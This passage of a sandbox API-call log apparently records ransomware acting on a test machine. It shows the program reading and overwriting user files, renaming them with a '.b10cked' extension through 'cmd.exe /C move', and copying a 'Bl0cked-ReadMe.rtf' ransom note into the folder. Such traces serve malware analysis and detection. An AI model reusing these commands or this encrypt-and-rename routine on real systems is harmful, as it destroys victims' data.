"c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\iemcxg.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.487] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29027634187) returned 1 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.487] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xa650 [0233.488] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa650 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.488] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa168 [0233.488] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.489] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xa650 [0233.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.489] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xa650 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.490] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5327, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5327, lpOverlapped=0x0) returned 1 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.490] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5327, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5327, lpOverlapped=0x0) returned 1 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21287, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5329 [0233.490] ReadFile (in: 
hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5327, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5327, lpOverlapped=0x0) returned 1 [0233.490] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21287, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5329 [0233.490] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5327, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5327, lpOverlapped=0x0) returned 1 [0233.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieMCxg.pps", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0233.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieMCxg.pps", cchWideChar=10, lpMultiByteStr=0x131324c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ieMCxg.pps", lpUsedDefaultChar=0x0) returned 10 [0233.495] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xa650 [0233.495] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.495] CloseHandle (hObject=0x1b4) returned 1 [0233.496] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\ieMCxg.pps", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps") returned 0x3d [0233.496] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0233.497] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\ieMCxg.pps.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x990, dwThreadId=0xa60)) returned 1 [0233.498] CloseHandle (hObject=0x120) returned 1 [0233.498] CloseHandle (hObject=0x1b4) returned 1 [0233.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0233.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0233.498] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, 
lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount2=51) returned 3 [0233.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0233.499] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0233.499] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0233.499] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0233.499] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0233.499] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0233.499] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0233.500] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0233.500] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0233.500] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x8f0, dwThreadId=0xad8)) returned 1 [0233.531] CloseHandle (hObject=0x120) returned 1 [0233.531] CloseHandle (hObject=0x1b4) returned 1 [0233.531] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf")) returned 0x20 [0233.531] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.531] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.531] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.531] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.532] ReleaseMutex (hMutex=0xf8) returned 1 [0233.532] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.532] ReleaseMutex (hMutex=0xf8) returned 1 [0233.532] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.532] 
ReleaseMutex (hMutex=0xf8) returned 1 [0233.532] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.532] ReleaseMutex (hMutex=0xf8) returned 1 [0233.532] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\aK_FOd5jl.ots" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\ak_fod5jl.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29032122958) returned 1 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.532] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16db7 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.532] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16db7 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.533] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x168cf [0233.533] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, 
nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16db7 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 